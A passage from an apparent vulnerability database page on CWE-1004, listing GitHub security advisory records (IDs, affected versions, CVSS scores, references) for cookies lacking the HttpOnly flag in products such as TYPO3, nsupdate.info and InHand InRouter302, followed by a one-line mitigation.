[https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)",
"id": "GHSA-h9fp-p2p9-873q",
"modified": "2026-02-27T21:50:14Z",
"published": "2026-02-25T19:29:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/security/advisories/GHSA-h9fp-p2p9-873q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25734"
},
{
"type": "WEB",
"url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/rucio/rucio"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": " Rucio WebUI has Stored Cross-site Scripting (XSS) in RSE Metadata"
}
GHSA-MH9V-6MM6-9GM4
Vulnerability from github – Published: 2022-05-24 19:12 – Updated: 2022-09-30 00:00In PEPPERL+FUCHS WirelessHART-Gateway 3.0.8 and 3.0.9 the HttpOnly attribute is not set on a cookie. This allows the cookie's value to be read or set by client-side JavaScript.
{
"affected": [],
"aliases": [
"CVE-2021-34563"
],
"database_specific": {
"cwe_ids": [
"CWE-1004"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-08-31T11:15:00Z",
"severity": "LOW"
},
"details": "In PEPPERL+FUCHS WirelessHART-Gateway 3.0.8 and 3.0.9 the HttpOnly attribute is not set on a cookie. This allows the cookie\u0027s value to be read or set by client-side JavaScript.",
"id": "GHSA-mh9v-6mm6-9gm4",
"modified": "2022-09-30T00:00:41Z",
"published": "2022-05-24T19:12:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34563"
},
{
"type": "WEB",
"url": "https://cert.vde.com/en-us/advisories/vde-2021-027"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-MW9R-VP4H-34MP
Vulnerability from github – Published: 2023-02-09 21:30 – Updated: 2023-02-17 21:30Sensitive Cookie Without 'HttpOnly' Flag vulnerability in Johnson Controls System Configuration Tool (SCT) version 14 prior to 14.2.3 and version 15 prior to 15.0.3 could allow access to the cookie.
{
"affected": [],
"aliases": [
"CVE-2022-21939"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-732",
"CWE-79"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-02-09T21:15:00Z",
"severity": "MODERATE"
},
"details": "Sensitive Cookie Without \u0027HttpOnly\u0027 Flag vulnerability in Johnson Controls System Configuration Tool (SCT) version 14 prior to 14.2.3 and version 15 prior to 15.0.3 could allow access to the cookie.",
"id": "GHSA-mw9r-vp4h-34mp",
"modified": "2023-02-17T21:30:41Z",
"published": "2023-02-09T21:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21939"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-23-040-03"
},
{
"type": "WEB",
"url": "https://www.johnsoncontrols.com/cyber-solutions/security-advisories"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-MWVP-QR62-CVJX
Vulnerability from github – Published: 2022-12-28 00:30 – Updated: 2023-01-09 21:51A vulnerability classified as problematic has been found in nsupdate.info. This affects an unknown part of the file src/nsupdate/settings/base.py of the component CSRF Cookie Handler. The manipulation of the argument CSRF_COOKIE_HTTPONLY leads to cookie without httponly flag. It is possible to initiate the attack remotely. The name of the patch is 60a3fe559c453bc36b0ec3e5dd39c1303640a59a. It is recommended to apply a patch to fix this issue. The identifier VDB-216909 was assigned to this vulnerability.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "nsupdate"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.12.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-25091"
],
"database_specific": {
"cwe_ids": [
"CWE-1004"
],
"github_reviewed": true,
"github_reviewed_at": "2023-01-09T21:51:01Z",
"nvd_published_at": "2022-12-27T23:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability classified as problematic has been found in nsupdate.info. This affects an unknown part of the file `src/nsupdate/settings/base.py` of the component `CSRF Cookie Handler`. The manipulation of the argument `CSRF_COOKIE_HTTPONLY` leads to cookie without `httponly` flag. It is possible to initiate the attack remotely. The name of the patch is 60a3fe559c453bc36b0ec3e5dd39c1303640a59a. It is recommended to apply a patch to fix this issue. The identifier VDB-216909 was assigned to this vulnerability.",
"id": "GHSA-mwvp-qr62-cvjx",
"modified": "2023-01-09T21:51:01Z",
"published": "2022-12-28T00:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25091"
},
{
"type": "WEB",
"url": "https://github.com/nsupdate-info/nsupdate.info/pull/410"
},
{
"type": "WEB",
"url": "https://github.com/nsupdate-info/nsupdate.info/commit/60a3fe559c453bc36b0ec3e5dd39c1303640a59a"
},
{
"type": "PACKAGE",
"url": "https://github.com/nsupdate-info/nsupdate.info"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.216909"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.216909"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "nsupdate.info has Sensitive Cookie Without \u0027HttpOnly\u0027 Flag"
}
GHSA-PPVG-HW62-6PH9
Vulnerability from github – Published: 2024-05-30 15:11 – Updated: 2024-05-30 15:11It has been discovered that cookies created in the Install Tool are not hardened to be submitted only via HTTP. In combination with other vulnerabilities such as cross-site scripting it can lead to hijacking an active and valid session in the Install Tool.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-core"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.7.21"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-core"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.5.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-core"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "7.6.32"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1004"
],
"github_reviewed": true,
"github_reviewed_at": "2024-05-30T15:11:42Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "It has been discovered that cookies created in the Install Tool are not hardened to be submitted only via HTTP. In combination with other vulnerabilities such as cross-site scripting it can lead to hijacking an active and valid session in the Install Tool.\n\n",
"id": "GHSA-ppvg-hw62-6ph9",
"modified": "2024-05-30T15:11:42Z",
"published": "2024-05-30T15:11:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/2018-12-11-4.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/TYPO3-CMS/core"
},
{
"type": "WEB",
"url": "https://typo3.org/security/advisory/typo3-core-sa-2018-009"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "TYPO3 Security Misconfiguration in Install Tool Cookie"
}
GHSA-PQGP-549C-XHQ5
Vulnerability from github – Published: 2022-05-13 00:00 – Updated: 2022-05-24 00:00An information disclosure vulnerability exists in the web interface session cookie functionality of InHand Networks InRouter302 V3.5.4. The session cookie misses the HttpOnly flag, making it accessible via JavaScript and thus allowing an attacker, able to perform an XSS attack, to steal the session cookie.
{
"affected": [],
"aliases": [
"CVE-2022-25172"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-732",
"CWE-79"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-12T17:15:00Z",
"severity": "MODERATE"
},
"details": "An information disclosure vulnerability exists in the web interface session cookie functionality of InHand Networks InRouter302 V3.5.4. The session cookie misses the HttpOnly flag, making it accessible via JavaScript and thus allowing an attacker, able to perform an XSS attack, to steal the session cookie.",
"id": "GHSA-pqgp-549c-xhq5",
"modified": "2022-05-24T00:00:34Z",
"published": "2022-05-13T00:00:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25172"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2022-1470"
},
{
"type": "WEB",
"url": "https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Leverage the HttpOnly flag when setting a sensitive cookie in a response.
No CAPEC attack patterns related to this CWE.